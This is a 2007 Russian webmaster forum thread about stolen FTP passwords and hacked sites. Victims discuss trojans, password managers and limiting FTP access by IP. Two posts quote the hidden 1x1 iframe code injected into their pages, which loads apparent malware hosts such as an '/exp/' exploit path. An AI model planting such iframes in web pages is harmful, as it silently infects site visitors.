Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
Читеры и Разгильдяи
»
Тема:
Взлом фтп
Новая тема
Ответить
цитата
18/05/07 в 14:00
Юнга
Hide-R писал:
pierx:
У KeePass, на котором я сижу он очень мощный.
Сенкс, уже щупаю его.. Wand - сука удобный, но не секьюрный нифига.
А как ты автоматом с флешки бэкап делаешь? Встроенные средства или руками чего-то воротил? Я вот под Вистой сходу так и не нашел ничего..
цитата
18/05/07 в 19:35
color
Юнга писал:
Сенкс, уже щупаю его.. Wand - сука удобный, но не секьюрный нифига.
А как ты автоматом с флешки бэкап делаешь? Встроенные средства или руками чего-то воротил? Я вот под Вистой сходу так и не нашел ничего..
в висте вообще то встроенный автобэкап достаточно удобный есть.
я через него ноут на десктоп бэкаплю
цитата
18/05/07 в 19:58
Swapper
Да, недавно фтп-пароль таким образом судя по всему сперли. Но у себя трояна не нашел.
цитата
18/05/07 в 20:31
Stek
просто надо нормальный софт использовать а не качать крэки с вареза, тогда шансы быть затрояненным сильно уменьшаются
цитата
18/05/07 в 22:34
Kors
Stek:
тут дело не в креках.
я тоже такую заразу поймал, и даже почти догадываюсь где...
Swapper:
проверь вот это: %windows%\csrss.exe
по принципу действия очень похож на тот что Ман ссылку давал, тоже имитирует нажатия кнопок в окнах сообщений (т.е. оутпост и каспер не спасают) запускается как системный процесс - просто так не снимешь.
цитата
19/05/07 в 13:22
localhost
если есть паранойя или подозрение, запускайте AVZ4 с опциями поиска рут-китов и юзер-китов и максимальным уровнем анализа
цитата
19/05/07 в 23:40
case
пиздец какой то. на всех доменах поголовно на мордах ифрейм
что он грузит ..х.знает но грузит что то тяжелое в комп и сеть начинает тупить.
везде вот это
Код:
<iframe src='чttp://kleman.info' width='1' height='1' style='visibility: hidden;'></iframe>
<iframe src='чttp://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
цитата
20/05/07 в 12:24
miroz
Как-то подозрительно, уж очень сильная эпидемия началась, где все могли это подцепить?
цитата
20/05/07 в 14:38
zteam
Есть небольшое подозрение, что подцепил кто-то из саппорта разработчиков софта(сж-скриптов, ротаторов, к примеру), которые для установки этого софта просят фтп/ssh-доступ на сервак.
цитата
20/05/07 в 14:53
color
miroz писал:
Как-то подозрительно, уж очень сильная эпидемия началась, где все могли это подцепить?
да эпидемия уже несколько месяцев идет
цитата
20/05/07 в 15:09
case
ну у меня к примеру нет сиджеев, а трой стоял даже на тех сайтах где вообще ничего нет, один индекс с надписью comming soon
и с сапортом я не общаюсь ни с каким. по аське пароли тоже не проходили
цитата
20/05/07 в 15:26
color
может пароли хранил в фтп-клиенте? или еще где на компе
цитата
20/05/07 в 16:06
_Milan_
наивные, сейчас пароли к фтп...совсем не троянами пиздятся....
цитата
21/05/07 в 01:30
Hide-R
Юнга писал:
Сенкс, уже щупаю его.. Wand - сука удобный, но не секьюрный нифига.
А как ты автоматом с флешки бэкап делаешь? Встроенные средства или руками чего-то воротил? Я вот под Вистой сходу так и не нашел ничего..
Бекап мне плагин делает. Их пара есть на странице плагинов KeePass...
цитата
21/05/07 в 09:41
Kors
_Milan_ писал:
наивные, сейчас пароли к фтп...совсем не троянами пиздятся....
угу, а то что я какую то дрянь при этом у себя нашел - это типа совпадение?
цитата
21/05/07 в 10:36
awa
Milan, очень информативно отписал, спасибо
/me пометил себе "совсем не троянами.."
цитата
21/05/07 в 17:33
case
понеслось по второму кругу, только с домена РУ на сей раз. начал массово менять пароли, может поможет.
проверяйте свои сайты.
цитата
22/05/07 в 09:05
miroz
Бляяяя, вот, сидишь читаешь, думаешь с тобой такого не случиться
(
Сегодня прихожу. смотрю на одном сайте провалилась прода и траф ниже плинтуса, открываю, а там бля такая хуйня
Код:
<iframe src="http://antispyx.info/exp/" width=1 height=1 style="display:none"></iframe>
Самое интересное, на этом дедике несколько сайтов, более того на этом айпищнике несколько доменов, НО ифрем вставили только на одном домене, на котором были открыты дополнительные два ФТП, один из них открывал разработчику скрипта, а потом забыл закрыть
(
Вот и думайте.
На других доменах ничего не повесили.
Троян.... вряд ли, сижу через Лису + NOD32, все конесно может быть, но не вериться, был бы троян наверно повесили и на других
(
Бля, с этим надо что-то делать!
ЗЫ: Как самому ограничить заход по ФТП только с определенных IP?
цитата
22/05/07 в 09:12
XXX-Server
miroz писал:
на котором были открыты дополнительные два ФТП, один из них открывал разработчику скрипта, а потом забыл закрыть
(
Вот и думайте.
На других доменах ничего не повесили.
Троян.... вряд ли, сижу через Лису + NOD32, все конесно может быть, но не вериться, был бы троян наверно повесили и на других
(
ну у разработчика скрипта троян значит, что непонятного то
Цитата:
ЗЫ: Как самому ограничить заход по ФТП только с определенных IP?
в файерволе закрыть 21 порт и разрешить только для своего IP
цитата
22/05/07 в 09:17
miroz
Swapper писал:
Да, недавно фтп-пароль таким образом судя по всему сперли. Но у себя трояна не нашел.
Подозреваю, что это не через трояна ставят, но как не знаю
цитата
22/05/07 в 09:18
miroz
XXX-Server писал:
в файерволе закрыть 21 порт и разрешить только для своего IP
В каком файерволе?
На дедике стоит CentOS+DirectAdmin. Я как то с Линухом не очень дружу
цитата
22/05/07 в 09:31
XXX-Server
miroz писал:
В каком файерволе?
На дедике стоит CentOS+DirectAdmin. Я как то с Линухом не очень дружу
ну админа попросить значит
цитата
22/05/07 в 09:36
miroz
_Milan_ писал:
наивные, сейчас пароли к фтп...совсем не троянами пиздятся....
Может подробности расскажешь?
цитата
22/05/07 в 09:38
miroz
XXX-Server писал:
ну админа попросить значит
Админа хрен достанешь
(
цитата
22/05/07 в 09:40
XXX-Server
miroz писал:
Админа хрен достанешь
(
ну мы можем сделать, за небольшую плату и при наличии свободного времени
стукни ближе к вечеру к колору, 10-95-48-1-7-9
Стр.
« первая
<
1
,
2
,
3
,
4
,
5
>
последняя »
Новая тема
Ответить
Эта страница в полной версии